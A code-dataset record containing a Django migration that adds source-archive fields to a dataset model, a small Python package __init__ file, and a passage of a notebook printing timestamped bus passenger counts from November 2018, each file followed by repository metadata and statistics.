data_facility_admin/migrations/0013_auto_20181120_0828.py
|
NYU-CI/dfadmin
|
071f38c62aea8ef8bf4ae82dbd672694e719b9bf
|
[
"CC0-1.0"
] | 1
|
2021-04-08T05:22:35.000Z
|
2021-04-08T05:22:35.000Z
|
data_facility_admin/migrations/0013_auto_20181120_0828.py
|
NYU-CI/dfadmin
|
071f38c62aea8ef8bf4ae82dbd672694e719b9bf
|
[
"CC0-1.0"
] | 8
|
2019-08-05T18:16:07.000Z
|
2019-10-29T18:42:53.000Z
|
data_facility_admin/migrations/0013_auto_20181120_0828.py
|
NYU-CI/dfadmin
|
071f38c62aea8ef8bf4ae82dbd672694e719b9bf
|
[
"CC0-1.0"
] | 2
|
2019-09-11T15:24:32.000Z
|
2020-01-08T20:34:05.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-11-20 13:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('data_facility_admin', '0012_auto_20181115_2045'),
]
operations = [
migrations.AddField(
model_name='dataset',
name='source_archive',
            field=models.CharField(blank=True, help_text=b'Represents the source archive reference for this dataset in the case that we got it from an archive instead of directly from the data owner/provider.', max_length=256, null=True),
),
migrations.AddField(
model_name='dataset',
name='source_url',
field=models.CharField(blank=True, help_text=b'Indicates the URL for the Source Archive, when this information is needed.', max_length=256, null=True),
),
migrations.AddField(
model_name='historicaldataset',
name='source_archive',
            field=models.CharField(blank=True, help_text=b'Represents the source archive reference for this dataset in the case that we got it from an archive instead of directly from the data owner/provider.', max_length=256, null=True),
),
migrations.AddField(
model_name='historicaldataset',
name='source_url',
field=models.CharField(blank=True, help_text=b'Indicates the URL for the Source Archive, when this information is needed.', max_length=256, null=True),
),
]
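# Hypothetical origin of the AddField operations above: adding two optional
# CharFields to the Dataset model (and its historical mirror) in the app's
# models.py, e.g.
#
#   source_archive = models.CharField(blank=True, null=True, max_length=256)
#
# after which `python manage.py makemigrations` emits this migration.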
| 43.111111
| 233
| 0.666881
| 196
| 1,552
| 5.147959
| 0.367347
| 0.077304
| 0.091179
| 0.107037
| 0.800793
| 0.800793
| 0.800793
| 0.760159
| 0.760159
| 0.760159
| 0
| 0.037257
| 0.239046
| 1,552
| 35
| 234
| 44.342857
| 0.817104
| 0.042526
| 0
| 0.714286
| 1
| 0.071429
| 0.387053
| 0.015509
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0e34b19ef42260550a0a33c389e7dcddd97576c8
| 189
|
py
|
Python
|
didipack/__init__.py
|
AntoineDidisheim/didipack
|
9c9266bf248cae79e6ffddd98b7e573108abaa57
|
[
"MIT"
] | null | null | null |
didipack/__init__.py
|
AntoineDidisheim/didipack
|
9c9266bf248cae79e6ffddd98b7e573108abaa57
|
[
"MIT"
] | null | null | null |
didipack/__init__.py
|
AntoineDidisheim/didipack
|
9c9266bf248cae79e6ffddd98b7e573108abaa57
|
[
"MIT"
] | 1
|
2021-02-08T09:26:04.000Z
|
2021-02-08T09:26:04.000Z
|
from didipack.latex_table import *
from didipack.parameters import ParamsBasis
from didipack.latex_ressource import *
from didipack.latex_paper import *
from didipack.plot_function import *
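# Usage sketch (hypothetical): the star imports flatten the package namespace,
# so consumers can write
#
#   import didipack
#   params = didipack.ParamsBasis()   # constructor arguments assumed
#
# rather than importing from each submodule path.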
| 37.8
| 43
| 0.851852
| 25
| 189
| 6.28
| 0.44
| 0.382166
| 0.324841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.100529
| 189
| 5
| 44
| 37.8
| 0.923529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0e5f41e8882e187a291d295d418d630b51cb595f
| 615,523
|
py
|
Python
|
hubus-dati/analisi dati.py
|
Liukooo/Hubus
|
344cc2b42343ebf12a1817ad97c5b77c0813b31a
|
[
"MIT"
] | null | null | null |
hubus-dati/analisi dati.py
|
Liukooo/Hubus
|
344cc2b42343ebf12a1817ad97c5b77c0813b31a
|
[
"MIT"
] | null | null | null |
hubus-dati/analisi dati.py
|
Liukooo/Hubus
|
344cc2b42343ebf12a1817ad97c5b77c0813b31a
|
[
"MIT"
] | null | null | null |
{
"cells": [
{
"cell_type": "code",
"execution_count": 8,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 06:46:14', '0']\n",
"['2018-11-22 06:52:11', '0']\n",
"['2018-11-22 06:52:27', '1']\n",
"['2018-11-22 06:53:01', '2']\n",
"['2018-11-22 06:53:50', '2']\n",
"['2018-11-22 06:54:42', '2']\n",
"['2018-11-22 06:54:53', '2']\n",
"['2018-11-22 06:55:17', '3']\n",
"['2018-11-22 06:56:21', '3']\n",
"['2018-11-22 06:57:57', '3']\n",
"['2018-11-22 06:58:11', '3']\n",
"['2018-11-22 06:58:42', '4']\n",
"['2018-11-22 06:59:38', '4']\n",
"['2018-11-22 06:59:46', '5']\n",
"['2018-11-22 07:00:58', '5']\n",
"['2018-11-22 07:01:51', '5']\n",
"['2018-11-22 07:03:35', '7']\n",
"['2018-11-22 07:05:37', '9']\n",
"['2018-11-22 07:06:31', '10']\n",
"['2018-11-22 07:07:18', '14']\n",
"['2018-11-22 07:07:59', '15']\n",
"['2018-11-22 07:08:56', '17']\n",
"['2018-11-22 07:09:53', '17']\n",
"['2018-11-22 07:10:19', '18']\n",
"['2018-11-22 07:11:18', '19']\n",
"['2018-11-22 07:12:54', '19']\n",
"['2018-11-22 07:13:32', '19']\n",
"['2018-11-22 07:14:10', '20']\n",
"['2018-11-22 07:15:47', '20']\n",
"['2018-11-22 07:16:18', '20']\n",
"['2018-11-22 07:16:45', '21']\n",
"['2018-11-22 07:17:30', '21']\n",
"['2018-11-22 07:18:59', '21']\n",
"['2018-11-22 07:19:20', '21']\n",
"['2018-11-22 07:20:44', '21']\n",
"['2018-11-22 07:21:25', '21']\n",
"['2018-11-22 07:22:26', '21']\n",
"['2018-11-22 07:23:05', '21']\n",
"['2018-11-22 07:26:14', '8']\n",
"['2018-11-22 07:27:21', '0']\n",
"['2018-11-22 07:29:22', '2']\n",
"['2018-11-22 07:31:24', '4']\n",
"['2018-11-22 07:33:25', '5']\n",
"['2018-11-22 07:35:27', '5']\n",
"['2018-11-22 07:37:29', '5']\n",
"['2018-11-22 07:39:30', '5']\n",
"['2018-11-22 07:41:32', '5']\n",
"['2018-11-22 07:43:34', '7']\n",
"['2018-11-22 07:45:35', '8']\n",
"['2018-11-22 07:47:37', '9']\n",
"['2018-11-22 07:49:39', '11']\n",
"['2018-11-22 07:51:40', '13']\n",
"['2018-11-22 07:53:42', '16']\n",
"['2018-11-22 07:55:44', '15']\n",
"['2018-11-22 07:57:45', '14']\n",
"['2018-11-22 07:59:47', '14']\n",
"['2018-11-22 08:01:49', '15']\n",
"['2018-11-22 08:03:50', '16']\n",
"['2018-11-22 08:05:52', '17']\n",
"['2018-11-22 08:07:54', '16']\n",
"['2018-11-22 08:09:55', '14']\n",
"['2018-11-22 08:11:57', '14']\n",
"['2018-11-22 08:13:59', '14']\n",
"['2018-11-22 08:16:00', '12']\n",
"['2018-11-22 08:18:02', '8']\n",
"['2018-11-22 08:20:04', '11']\n",
"['2018-11-22 08:22:05', '11']\n",
"['2018-11-22 08:24:07', '11']\n",
"['2018-11-22 08:26:09', '11']\n",
"['2018-11-22 08:28:10', '11']\n",
"['2018-11-22 08:30:12', '11']\n",
"['2018-11-22 08:32:14', '13']\n",
"['2018-11-22 08:34:15', '13']\n",
"['2018-11-22 08:36:17', '10']\n",
"['2018-11-22 08:38:19', '7']\n",
"['2018-11-22 08:40:20', '7']\n",
"['2018-11-22 08:42:22', '7']\n",
"['2018-11-22 08:44:24', '1']\n",
"['2018-11-22 08:46:25', '1']\n",
"['2018-11-22 08:48:27', '0']\n",
"['2018-11-22 08:50:29', '0']\n",
"['2018-11-22 08:52:30', '0']\n",
"['2018-11-22 08:54:32', '0']\n",
"['2018-11-22 08:56:34', '9']\n",
"['2018-11-22 08:57:07', '13']\n",
"['2018-11-22 08:58:14', '15']\n",
"['2018-11-22 08:58:26', '15']\n",
"['2018-11-22 08:59:12', '16']\n",
"['2018-11-22 09:00:25', '23']\n",
"['2018-11-22 09:01:08', '23']\n",
"['2018-11-22 09:01:35', '26']\n",
"['2018-11-22 09:03:52', '26']\n",
"['2018-11-22 09:06:03', '30']\n",
"['2018-11-22 09:06:47', '30']\n",
"['2018-11-22 09:07:29', '40']\n",
"['2018-11-22 09:08:16', '42']\n",
"['2018-11-22 09:09:02', '42']\n",
"['2018-11-22 09:10:45', '42']\n",
"['2018-11-22 09:11:32', '41']\n",
"['2018-11-22 09:14:54', '44']\n",
"['2018-11-22 09:17:06', '45']\n",
"['2018-11-22 09:18:48', '38']\n",
"['2018-11-22 09:20:40', '37']\n",
"['2018-11-22 09:22:07', '32']\n",
"['2018-11-22 09:23:59', '32']\n",
"['2018-11-22 09:25:34', '32']\n",
"['2018-11-22 09:26:39', '28']\n",
"['2018-11-22 09:28:21', '26']\n",
"['2018-11-22 09:31:33', '26']\n",
"['2018-11-22 09:36:44', '25']\n",
"['2018-11-22 09:44:14', '25']\n",
"['2018-11-22 09:45:55', '25']\n",
"['2018-11-22 09:46:46', '25']\n",
"['2018-11-22 09:47:16', '25']\n",
"['2018-11-22 09:47:38', '25']\n",
"['2018-11-22 09:48:19', '21']\n",
"['2018-11-22 09:49:11', '21']\n",
"['2018-11-22 09:50:31', '14']\n",
"['2018-11-22 09:51:36', '14']\n",
"['2018-11-22 09:52:32', '14']\n",
"['2018-11-22 09:53:09', '14']\n",
"['2018-11-22 09:54:49', '14']\n",
"['2018-11-22 09:55:50', '13']\n",
"['2018-11-22 09:56:39', '13']\n",
"['2018-11-22 09:57:14', '12']\n",
"['2018-11-22 10:02:12', '4']\n",
"['2018-11-22 10:03:16', '0']\n",
"['2018-11-22 10:04:28', '6']\n",
"['2018-11-22 10:05:41', '9']\n",
"['2018-11-22 10:06:54', '10']\n",
"['2018-11-22 10:08:07', '10']\n",
"['2018-11-22 10:09:20', '10']\n",
"['2018-11-22 10:10:33', '11']\n",
"['2018-11-22 10:11:46', '12']\n",
"['2018-11-22 10:12:59', '16']\n",
"['2018-11-22 10:14:12', '15']\n",
"['2018-11-22 10:15:25', '15']\n",
"['2018-11-22 10:16:38', '15']\n",
"['2018-11-22 10:17:51', '14']\n",
"['2018-11-22 10:19:04', '12']\n",
"['2018-11-22 10:20:17', '13']\n",
"['2018-11-22 10:21:30', '13']\n",
"['2018-11-22 10:22:43', '12']\n",
"['2018-11-22 10:23:56', '12']\n",
"['2018-11-22 10:25:09', '12']\n",
"['2018-11-22 10:26:22', '9']\n",
"['2018-11-22 10:27:35', '7']\n",
"['2018-11-22 10:28:48', '7']\n",
"['2018-11-22 10:30:01', '7']\n",
"['2018-11-22 10:31:14', '6']\n",
"['2018-11-22 10:32:27', '7']\n",
"['2018-11-22 10:33:40', '7']\n",
"['2018-11-22 10:34:53', '8']\n",
"['2018-11-22 10:36:06', '8']\n",
"['2018-11-22 10:37:19', '7']\n",
"['2018-11-22 10:38:32', '6']\n",
"['2018-11-22 10:39:45', '5']\n",
"['2018-11-22 10:40:58', '4']\n",
"['2018-11-22 10:42:11', '4']\n",
"['2018-11-22 10:43:24', '4']\n",
"['2018-11-22 10:44:37', '4']\n",
"['2018-11-22 10:45:50', '1']\n",
"['2018-11-22 10:47:03', '1']\n",
"['2018-11-22 10:48:16', '1']\n",
"['2018-11-22 10:49:29', '0']\n",
"['2018-11-22 10:50:42', '0']\n",
"['2018-11-22 10:51:55', '0']\n",
"['2018-11-22 10:53:08', '0']\n",
"['2018-11-22 10:54:21', '0']\n",
"['2018-11-22 10:55:34', '0']\n",
"['2018-11-22 10:56:47', '5']\n",
"['2018-11-22 10:57:31', '5']\n",
"['2018-11-22 10:57:54', '5']\n",
"['2018-11-22 10:58:39', '5']\n",
"['2018-11-22 10:59:16', '5']\n",
"['2018-11-22 11:00:04', '6']\n",
"['2018-11-22 11:00:39', '8']\n",
"['2018-11-22 11:01:36', '7']\n",
"['2018-11-22 11:02:57', '8']\n",
"['2018-11-22 11:05:09', '8']\n",
"['2018-11-22 11:05:23', '8']\n",
"['2018-11-22 11:05:55', '11']\n",
"['2018-11-22 11:07:28', '11']\n",
"['2018-11-22 11:07:43', '11']\n",
"['2018-11-22 11:08:39', '13']\n",
"['2018-11-22 11:09:42', '12']\n",
"['2018-11-22 11:15:19', '18']\n",
"['2018-11-22 11:17:50', '19']\n",
"['2018-11-22 11:19:20', '19']\n",
"['2018-11-22 11:20:41', '23']\n",
"['2018-11-22 11:22:39', '22']\n",
"['2018-11-22 11:24:35', '26']\n",
"['2018-11-22 11:25:33', '27']\n",
"['2018-11-22 11:26:34', '26']\n",
"['2018-11-22 11:28:34', '27']\n",
"['2018-11-22 11:29:33', '28']\n",
"['2018-11-22 11:30:37', '30']\n",
"['2018-11-22 11:31:30', '29']\n",
"['2018-11-22 11:34:37', '26']\n",
"['2018-11-22 11:35:55', '26']\n",
"['2018-11-22 11:36:23', '26']\n",
"['2018-11-22 11:36:40', '26']\n",
"['2018-11-22 11:37:32', '26']\n",
"['2018-11-22 11:37:51', '26']\n",
"['2018-11-22 11:39:08', '26']\n",
"['2018-11-22 11:39:47', '26']\n",
"['2018-11-22 11:40:42', '26']\n",
"['2018-11-22 11:41:15', '26']\n",
"['2018-11-22 11:42:52', '26']\n",
"['2018-11-22 11:43:46', '25']\n",
"['2018-11-22 11:44:06', '25']\n",
"['2018-11-22 11:45:14', '25']\n",
"['2018-11-22 11:50:22', '4']\n",
"['2018-11-22 11:52:04', '0']\n",
"['2018-11-22 11:53:35', '2']\n",
"['2018-11-22 11:55:07', '11']\n",
"['2018-11-22 11:56:38', '11']\n",
"['2018-11-22 11:58:10', '11']\n",
"['2018-11-22 11:59:41', '11']\n",
"['2018-11-22 12:01:13', '12']\n",
"['2018-11-22 12:02:45', '12']\n",
"['2018-11-22 12:04:16', '12']\n",
"['2018-11-22 12:05:48', '12']\n",
"['2018-11-22 12:07:19', '13']\n",
"['2018-11-22 12:08:51', '13']\n",
"['2018-11-22 12:10:23', '20']\n",
"['2018-11-22 12:11:54', '21']\n",
"['2018-11-22 12:13:26', '21']\n",
"['2018-11-22 12:14:57', '21']\n",
"['2018-11-22 12:16:29', '22']\n",
"['2018-11-22 12:18:01', '25']\n",
"['2018-11-22 12:19:32', '31']\n",
"['2018-11-22 12:21:04', '25']\n",
"['2018-11-22 12:22:35', '29']\n",
"['2018-11-22 12:24:07', '28']\n",
"['2018-11-22 12:25:39', '32']\n",
"['2018-11-22 12:27:10', '31']\n",
"['2018-11-22 12:28:42', '30']\n",
"['2018-11-22 12:30:13', '15']\n",
"['2018-11-22 12:31:45', '16']\n",
"['2018-11-22 12:33:16', '15']\n",
"['2018-11-22 12:34:48', '12']\n",
"['2018-11-22 12:36:20', '12']\n",
"['2018-11-22 12:37:51', '11']\n",
"['2018-11-22 12:39:23', '10']\n",
"['2018-11-22 12:40:54', '10']\n",
"['2018-11-22 12:42:26', '9']\n",
"['2018-11-22 12:43:58', '9']\n",
"['2018-11-22 12:45:29', '6']\n",
"['2018-11-22 12:47:01', '6']\n",
"['2018-11-22 12:48:32', '6']\n",
"['2018-11-22 12:50:04', '4']\n",
"['2018-11-22 12:51:36', '3']\n",
"['2018-11-22 12:53:07', '2']\n",
"['2018-11-22 12:54:39', '2']\n",
"['2018-11-22 12:56:10', '2']\n",
"['2018-11-22 12:57:42', '0']\n",
"['2018-11-22 12:59:14', '0']\n",
"['2018-11-22 12:59:53', '2']\n",
"['2018-11-22 13:01:11', '2']\n",
"['2018-11-22 13:01:23', '4']\n",
"['2018-11-22 13:02:29', '4']\n",
"['2018-11-22 13:03:55', '8']\n",
"['2018-11-22 13:04:08', '8']\n",
"['2018-11-22 13:04:38', '8']\n",
"['2018-11-22 13:05:25', '8']\n",
"['2018-11-22 13:07:24', '10']\n",
"['2018-11-22 13:08:05', '10']\n",
"['2018-11-22 13:08:39', '11']\n",
"['2018-11-22 13:09:39', '11']\n",
"['2018-11-22 13:09:48', '13']\n",
"['2018-11-22 13:11:10', '11']\n",
"['2018-11-22 13:12:17', '9']\n",
"['2018-11-22 13:15:35', '15']\n",
"['2018-11-22 13:18:19', '17']\n",
"['2018-11-22 13:20:13', '17']\n",
"['2018-11-22 13:22:55', '17']\n",
"['2018-11-22 13:23:08', '21']\n",
"['2018-11-22 13:24:39', '24']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 13:25:35', '25']\n",
"['2018-11-22 13:27:19', '23']\n",
"['2018-11-22 13:28:50', '17']\n",
"['2018-11-22 13:30:00', '19']\n",
"['2018-11-22 13:31:01', '19']\n",
"['2018-11-22 13:31:34', '17']\n",
"['2018-11-22 13:34:09', '15']\n",
"['2018-11-22 13:35:04', '15']\n",
"['2018-11-22 13:35:27', '14']\n",
"['2018-11-22 13:36:04', '13']\n",
"['2018-11-22 13:37:05', '12']\n",
"['2018-11-22 13:37:51', '12']\n",
"['2018-11-22 13:39:07', '12']\n",
"['2018-11-22 13:39:47', '12']\n",
"['2018-11-22 13:40:48', '11']\n",
"['2018-11-22 13:41:22', '10']\n",
"['2018-11-22 13:43:20', '9']\n",
"['2018-11-22 13:44:40', '7']\n",
"['2018-11-22 13:45:22', '7']\n",
"['2018-11-22 13:46:21', '7']\n",
"['2018-11-22 13:50:52', '2']\n",
"['2018-11-22 13:52:03', '0']\n",
"['2018-11-22 13:53:31', '7']\n",
"['2018-11-22 13:55:00', '59']\n",
"['2018-11-22 13:56:29', '64']\n",
"['2018-11-22 13:57:57', '64']\n",
"['2018-11-22 13:59:26', '64']\n",
"['2018-11-22 14:00:55', '79']\n",
"['2018-11-22 14:02:23', '80']\n",
"['2018-11-22 14:03:52', '82']\n",
"['2018-11-22 14:05:21', '83']\n",
"['2018-11-22 14:06:49', '83']\n",
"['2018-11-22 14:08:18', '81']\n",
"['2018-11-22 14:09:47', '82']\n",
"['2018-11-22 14:11:15', '79']\n",
"['2018-11-22 14:12:44', '78']\n",
"['2018-11-22 14:14:13', '77']\n",
"['2018-11-22 14:15:41', '77']\n",
"['2018-11-22 14:17:10', '62']\n",
"['2018-11-22 14:18:39', '63']\n",
"['2018-11-22 14:20:07', '58']\n",
"['2018-11-22 14:21:36', '55']\n",
"['2018-11-22 14:23:05', '58']\n",
"['2018-11-22 14:24:34', '59']\n",
"['2018-11-22 14:26:02', '56']\n",
"['2018-11-22 14:27:31', '52']\n",
"['2018-11-22 14:29:00', '65']\n",
"['2018-11-22 14:30:28', '65']\n",
"['2018-11-22 14:31:57', '60']\n",
"['2018-11-22 14:33:26', '57']\n",
"['2018-11-22 14:34:54', '55']\n",
"['2018-11-22 14:36:23', '54']\n",
"['2018-11-22 14:37:52', '52']\n",
"['2018-11-22 14:39:20', '47']\n",
"['2018-11-22 14:40:49', '47']\n",
"['2018-11-22 14:42:18', '42']\n",
"['2018-11-22 14:43:46', '32']\n",
"['2018-11-22 14:45:15', '30']\n",
"['2018-11-22 14:46:44', '28']\n",
"['2018-11-22 14:48:12', '17']\n",
"['2018-11-22 14:49:41', '15']\n",
"['2018-11-22 14:51:10', '14']\n",
"['2018-11-22 14:52:38', '11']\n",
"['2018-11-22 14:54:07', '5']\n",
"['2018-11-22 14:55:36', '0']\n",
"['2018-11-22 14:57:05', '4']\n",
"['2018-11-22 14:57:45', '5']\n",
"['2018-11-22 14:58:02', '5']\n",
"['2018-11-22 14:58:44', '5']\n",
"['2018-11-22 14:59:18', '5']\n",
"['2018-11-22 15:00:22', '5']\n",
"['2018-11-22 15:01:08', '6']\n",
"['2018-11-22 15:01:37', '6']\n",
"['2018-11-22 15:02:45', '10']\n",
"['2018-11-22 15:04:18', '10']\n",
"['2018-11-22 15:05:02', '12']\n",
"['2018-11-22 15:05:50', '12']\n",
"['2018-11-22 15:06:37', '13']\n",
"['2018-11-22 15:07:15', '14']\n",
"['2018-11-22 15:08:52', '15']\n",
"['2018-11-22 15:09:54', '17']\n",
"['2018-11-22 15:15:19', '23']\n",
"['2018-11-22 15:18:11', '23']\n",
"['2018-11-22 15:19:30', '25']\n",
"['2018-11-22 15:21:36', '34']\n",
"['2018-11-22 15:22:33', '35']\n",
"['2018-11-22 15:24:01', '34']\n",
"['2018-11-22 15:25:38', '29']\n",
"['2018-11-22 15:27:54', '27']\n",
"['2018-11-22 15:29:53', '27']\n",
"['2018-11-22 15:32:25', '27']\n",
"['2018-11-22 15:34:50', '33']\n",
"['2018-11-22 15:36:34', '28']\n",
"['2018-11-22 15:40:40', '26']\n",
"['2018-11-22 15:41:41', '30']\n",
"['2018-11-22 15:42:48', '33']\n",
"['2018-11-22 15:43:31', '30']\n",
"['2018-11-22 15:44:45', '25']\n",
"['2018-11-22 15:45:32', '28']\n",
"['2018-11-22 15:47:15', '27']\n",
"['2018-11-22 15:48:18', '23']\n",
"['2018-11-22 15:49:08', '19']\n",
"['2018-11-22 15:50:14', '12']\n",
"['2018-11-22 15:52:16', '8']\n",
"['2018-11-22 15:53:37', '5']\n",
"['2018-11-22 15:54:25', '1']\n",
"['2018-11-22 15:55:26', '1']\n",
"['2018-11-22 16:00:50', '0']\n",
"['2018-11-22 16:01:58', '0']\n",
"['2018-11-22 16:03:15', '7']\n",
"['2018-11-22 16:04:33', '9']\n",
"['2018-11-22 16:05:50', '7']\n",
"['2018-11-22 16:07:08', '7']\n",
"['2018-11-22 16:08:26', '7']\n",
"['2018-11-22 16:09:43', '4']\n",
"['2018-11-22 16:11:01', '11']\n",
"['2018-11-22 16:12:18', '10']\n",
"['2018-11-22 16:13:36', '10']\n",
"['2018-11-22 16:14:54', '5']\n",
"['2018-11-22 16:16:11', '5']\n",
"['2018-11-22 16:17:29', '2']\n",
"['2018-11-22 16:18:46', '0']\n",
"['2018-11-22 16:20:04', '0']\n",
"['2018-11-22 16:21:22', '5']\n",
"['2018-11-22 16:22:39', '7']\n",
"['2018-11-22 16:23:57', '13']\n",
"['2018-11-22 16:25:15', '11']\n",
"['2018-11-22 16:26:32', '6']\n",
"['2018-11-22 16:27:50', '5']\n",
"['2018-11-22 16:29:07', '5']\n",
"['2018-11-22 16:30:25', '11']\n",
"['2018-11-22 16:31:43', '9']\n",
"['2018-11-22 16:33:00', '6']\n",
"['2018-11-22 16:34:18', '10']\n",
"['2018-11-22 16:35:35', '8']\n",
"['2018-11-22 16:36:53', '6']\n",
"['2018-11-22 16:38:11', '4']\n",
"['2018-11-22 16:39:28', '4']\n",
"['2018-11-22 16:40:46', '2']\n",
"['2018-11-22 16:42:04', '2']\n",
"['2018-11-22 16:43:21', '3']\n",
"['2018-11-22 16:44:39', '3']\n",
"['2018-11-22 16:45:56', '6']\n",
"['2018-11-22 16:47:14', '4']\n",
"['2018-11-22 16:48:32', '4']\n",
"['2018-11-22 16:49:49', '4']\n",
"['2018-11-22 16:51:07', '5']\n",
"['2018-11-22 16:52:24', '0']\n",
"['2018-11-22 16:53:42', '0']\n",
"['2018-11-22 16:55:00', '0']\n",
"['2018-11-22 16:56:17', '0']\n",
"['2018-11-22 16:57:35', '0']\n",
"['2018-11-22 16:58:53', '3']\n",
"['2018-11-22 16:59:22', '1']\n",
"['2018-11-22 17:01:15', '2']\n",
"['2018-11-22 17:01:53', '0']\n",
"['2018-11-22 17:02:34', '1']\n",
"['2018-11-22 17:03:52', '4']\n",
"['2018-11-22 17:04:33', '4']\n",
"['2018-11-22 17:04:55', '5']\n",
"['2018-11-22 17:05:57', '6']\n",
"['2018-11-22 17:07:36', '4']\n",
"['2018-11-22 17:07:51', '6']\n",
"['2018-11-22 17:08:21', '6']\n",
"['2018-11-22 17:09:54', '6']\n",
"['2018-11-22 17:10:05', '7']\n",
"['2018-11-22 17:11:34', '8']\n",
"['2018-11-22 17:12:40', '7']\n",
"['2018-11-22 17:15:41', '8']\n",
"['2018-11-22 17:18:00', '4']\n",
"['2018-11-22 17:20:08', '4']\n",
"['2018-11-22 17:21:56', '5']\n",
"['2018-11-22 17:23:00', '5']\n",
"['2018-11-22 17:24:19', '3']\n",
"['2018-11-22 17:25:43', '7']\n",
"['2018-11-22 17:26:58', '1']\n",
"['2018-11-22 17:28:22', '3']\n",
"['2018-11-22 17:29:34', '1']\n",
"['2018-11-22 17:30:51', '2']\n",
"['2018-11-22 17:31:49', '3']\n",
"['2018-11-22 17:35:08', '2']\n",
"['2018-11-22 17:36:18', '6']\n",
"['2018-11-22 17:36:53', '5']\n",
"['2018-11-22 17:37:20', '4']\n",
"['2018-11-22 17:38:27', '4']\n",
"['2018-11-22 17:39:10', '1']\n",
"['2018-11-22 17:40:51', '1']\n",
"['2018-11-22 17:41:49', '0']\n",
"['2018-11-22 17:42:41', '0']\n",
"['2018-11-22 17:43:13', '0']\n",
"['2018-11-22 17:45:15', '0']\n",
"['2018-11-22 17:46:24', '0']\n",
"['2018-11-22 17:46:43', '0']\n",
"['2018-11-22 17:47:45', '0']\n",
"['2018-11-22 17:52:41', '0']\n",
"['2018-11-22 17:53:51', '0']\n",
"['2018-11-22 17:55:17', '5']\n",
"['2018-11-22 17:56:43', '6']\n",
"['2018-11-22 17:58:09', '6']\n",
"['2018-11-22 17:59:36', '6']\n",
"['2018-11-22 18:01:02', '6']\n",
"['2018-11-22 18:02:28', '13']\n",
"['2018-11-22 18:03:55', '14']\n",
"['2018-11-22 18:05:21', '22']\n",
"['2018-11-22 18:06:47', '20']\n",
"['2018-11-22 18:08:13', '21']\n",
"['2018-11-22 18:09:40', '24']\n",
"['2018-11-22 18:11:06', '24']\n",
"['2018-11-22 18:12:32', '24']\n",
"['2018-11-22 18:13:59', '21']\n",
"['2018-11-22 18:15:25', '21']\n",
"['2018-11-22 18:16:51', '25']\n",
"['2018-11-22 18:18:18', '25']\n",
"['2018-11-22 18:19:44', '24']\n",
"['2018-11-22 18:21:10', '26']\n",
"['2018-11-22 18:22:36', '15']\n",
"['2018-11-22 18:24:03', '15']\n",
"['2018-11-22 18:25:29', '11']\n",
"['2018-11-22 18:26:55', '11']\n",
"['2018-11-22 18:28:22', '11']\n",
"['2018-11-22 18:29:48', '12']\n",
"['2018-11-22 18:31:14', '5']\n",
"['2018-11-22 18:32:40', '9']\n",
"['2018-11-22 18:34:07', '7']\n",
"['2018-11-22 18:35:33', '12']\n",
"['2018-11-22 18:36:59', '12']\n",
"['2018-11-22 18:38:26', '7']\n",
"['2018-11-22 18:39:52', '7']\n",
"['2018-11-22 18:41:18', '4']\n",
"['2018-11-22 18:42:45', '2']\n",
"['2018-11-22 18:44:11', '2']\n",
"['2018-11-22 18:45:37', '2']\n",
"['2018-11-22 18:47:03', '0']\n",
"['2018-11-22 18:48:30', '0']\n",
"['2018-11-22 18:49:56', '0']\n",
"['2018-11-22 18:51:22', '0']\n",
"['2018-11-22 18:52:49', '0']\n",
"['2018-11-22 18:54:15', '0']\n",
"['2018-11-22 18:55:41', '0']\n",
"['2018-11-22 18:57:08', '2']\n",
"['2018-11-22 18:57:37', '2']\n",
"['2018-11-22 18:58:19', '2']\n",
"['2018-11-22 18:58:53', '2']\n",
"['2018-11-22 18:59:11', '2']\n",
"['2018-11-22 19:00:14', '2']\n",
"['2018-11-22 19:00:45', '3']\n",
"['2018-11-22 19:01:39', '3']\n",
"['2018-11-22 19:02:20', '5']\n",
"['2018-11-22 19:04:07', '5']\n",
"['2018-11-22 19:04:47', '8']\n",
"['2018-11-22 19:05:20', '8']\n",
"['2018-11-22 19:06:53', '7']\n",
"['2018-11-22 19:07:11', '11']\n",
"['2018-11-22 19:08:08', '9']\n",
"['2018-11-22 19:09:08', '7']\n",
"['2018-11-22 19:15:23', '12']\n",
"['2018-11-22 19:17:17', '12']\n",
"['2018-11-22 19:19:17', '12']\n",
"['2018-11-22 19:20:45', '12']\n",
"['2018-11-22 19:21:37', '9']\n",
"['2018-11-22 19:23:35', '11']\n",
"['2018-11-22 19:25:09', '7']\n",
"['2018-11-22 19:27:38', '7']\n",
"['2018-11-22 19:28:22', '10']\n",
"['2018-11-22 19:28:42', '7']\n",
"['2018-11-22 19:30:16', '4']\n",
"['2018-11-22 19:31:01', '8']\n",
"['2018-11-22 19:33:49', '6']\n",
"['2018-11-22 19:34:30', '6']\n",
"['2018-11-22 19:35:26', '3']\n",
"['2018-11-22 19:36:01', '1']\n",
"['2018-11-22 19:36:58', '0']\n",
"['2018-11-22 19:37:59', '0']\n",
"['2018-11-22 19:39:32', '2']\n",
"['2018-11-22 19:40:31', '2']\n",
"['2018-11-22 19:41:21', '0']\n",
"['2018-11-22 19:41:53', '0']\n",
"['2018-11-22 19:43:44', '0']\n",
"['2018-11-22 19:44:37', '0']\n",
"['2018-11-22 19:45:16', '0']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 19:46:12', '0']\n",
"['2018-11-22 19:50:51', '0']\n",
